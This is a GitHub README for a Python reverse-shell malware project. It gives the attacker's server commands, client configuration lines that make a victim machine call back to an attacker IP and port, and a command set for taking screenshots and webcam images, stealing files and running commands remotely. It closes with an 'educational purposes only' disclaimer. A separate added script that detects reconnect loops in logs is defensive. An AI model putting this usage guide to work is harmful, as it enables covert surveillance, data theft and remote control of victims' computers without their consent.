Project author: MartysHD

Project description:
Python reverse shell malware.
Language: Python
Project address: git://github.com/MartysHD/Malware-ReverseShell.git
Created: 2019-06-11T18:48:58Z
Project community: https://github.com/MartysHD/Malware-ReverseShell

License: MIT License



Malware-ReverseShell

This Python malware program demonstrates how a reverse shell works.


A reverse shell is a type of malware in which the victim's device connects in the background to the attacker. This way the attacker can remotely control the victim's computer, watch their activity, grab information and really do anything he desires.



Reverse shell malware is divided into two main programs:

Server Side Program

The server side of the program belongs to the hacker/attacker.


The server program is started on a specified ip address, which can be public or local, with an open port. The victim is going to connect to these parameters. It is a console application, so everything happens inside a console/terminal.


After a connection is successfully established, the attacker (server) can start sending pre-defined commands to the victim (client). Some commands can be used before any client is connected (I named them server commands), but most of them work only with a connected client (server-client commands).

Make the server run and listen for upcoming connections

Use console arguments

Show all possible commands/arguments

  python server.py --help

Set ip address

  python server.py -ip [ip address]

Set port

  python server.py -port [port]

If you don’t want to manually set your ip address, you can use these arguments:

Sets server on your local ip address

  python server.py -get-local-ip

Sets server on your public ip address

  python server.py -get-external-ip

Specify the parameters in the program

  ip = '192.168.1.136'
  port = 5000
  server = Server(ip, port)
  server.run()

Console Environment - Commands

When you are in the program, after the server has been initialized and is listening for connections in the background, you can still use commands that are not related to a client. These commands only affect your running server program.


You can list all possible commands with the command list or print commands.

Server commands



print commands

  print commands / list


clear the screen

  clear


show ip address

  show ip


show port

  show port


show directory where screenshots are going to be saved

  show screenshots directory


show directory where webcam shots are going to be saved

  show webcam shots directory


save ip and port data

  save


set socket by client's id or name

  set [clients id or name]


unset the currently selected user

  unset


print new connections

  wait


show all connected clients

  clients


rename client

  rename [oldname newname]


show name instead of path

  name mode


Server-client commands


These are the commands that are related to the client; they are sent to the client, which responds to them.


You list the connected clients with the command clients.


After this you can select a client with the command set [client's id or name].


That's it! You can now send all the cool commands to the client and just like that start crawling through the victim's computer, taking screenshots, reading, sending or starting files, etc.

simple check if the connection with the client is all right

  check

request name from client

  get name

set and show client's path instead of name

  path mode

change directory

  cd [options/directory]

list directory

  dir [options]

open web page by url

  web [url]

Get screenshot from client

-d -> directory where screenshots are going to be saved

-s -> set start number for saving screenshots

  screenshot [-d (directory), -s (start number)]

Get image from client's webcam

  webcam

read and save file from client

  read [file]

send file

  send [file]

start and open file

  start [file]

reset connection with client

  reset

send any other command

  [command] -c

close the program

  close/exit/quit

Client Side Program

Before the malware is started on the client's machine, it needs to be configured with the server ip and port on which the server is listening for connections.


The client's program is going to keep trying, over and over, to connect to this ip address and port.
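
From the defender's side, that retry-until-connected behaviour leaves a trail: one host opening connection after connection to the same ip:port at a steady interval. The script below is an added example, not code from the MartysHD project; it flags such flows in a few constructed connection-log lines, and the log format, the thresholds and the addresses are assumptions made for the demo.

```python
# Added example (not part of Malware-ReverseShell): flag reconnect loops, i.e.
# a source host retrying the same destination ip:port many times in a row with
# only short gaps between attempts. Log format and values are constructed.
from collections import defaultdict
from datetime import datetime

# Constructed sample, one attempt per line:
#   "<timestamp> <src_ip> -> <dst_ip>:<dst_port> <outcome>"
# Host 10.0.0.23 hammers 192.168.1.136:5000 every 5 s until it succeeds;
# host 10.0.0.42 makes two ordinary HTTPS connections a minute and a half apart.
SAMPLE_LOG = """\
2019-06-11T18:50:01 10.0.0.23 -> 192.168.1.136:5000 refused
2019-06-11T18:50:06 10.0.0.23 -> 192.168.1.136:5000 refused
2019-06-11T18:50:11 10.0.0.23 -> 192.168.1.136:5000 refused
2019-06-11T18:50:16 10.0.0.23 -> 192.168.1.136:5000 refused
2019-06-11T18:50:21 10.0.0.23 -> 192.168.1.136:5000 established
2019-06-11T18:50:03 10.0.0.42 -> 203.0.113.10:443 established
2019-06-11T18:51:40 10.0.0.42 -> 203.0.113.10:443 established
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, src, dst_ip, dst_port, outcome)."""
    ts, src, _arrow, dst, outcome = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst_ip, int(dst_port), outcome


def find_reconnect_loops(log_text, min_attempts=4, max_gap_seconds=30):
    """Return {(src, dst_ip, dst_port): attempt_count} for every flow that was
    tried at least min_attempts times with no pause longer than max_gap_seconds
    between consecutive attempts. Outcome is ignored on purpose: the loop is
    suspicious whether or not the server was up to accept it."""
    attempts = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, src, dst_ip, dst_port, _outcome = parse_line(line)
        attempts[(src, dst_ip, dst_port)].append(ts)

    hits = {}
    for flow, times in attempts.items():
        times.sort()
        if len(times) < min_attempts:
            continue
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        if max(gaps) <= max_gap_seconds:
            hits[flow] = len(times)
    return hits


if __name__ == "__main__":
    for (src, dst_ip, dst_port), count in find_reconnect_loops(SAMPLE_LOG).items():
        print(f"{src} retried {dst_ip}:{dst_port} {count} times in quick succession")
```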


After the client is connected, everything is ready for the attacker and he can start manipulating the victim's device.


Initialize the client's program by adding these couple of lines inside the client's malware program:

  server_ip = '192.168.1.136'
  port = 5000
  name = 'my_brother'
  client = Client(server_ip, port, name)
  client.run()

In these examples I've used a local ip address. Of course you can use public ip addresses, but for that you need to have set up your own server with a public ip address, or without a public server you can try port forwarding (if you own a public ip address from your ISP), but be careful with that because a lot of security issues can come from it.

Disclaimer


The code was written back in the days when I had no knowledge about data structures, algorithms, clean code rules, etc. Feel free to refactor / add new functionality and create a pull request :).


This project was made for educational purposes only.


You are solely responsible for your actions!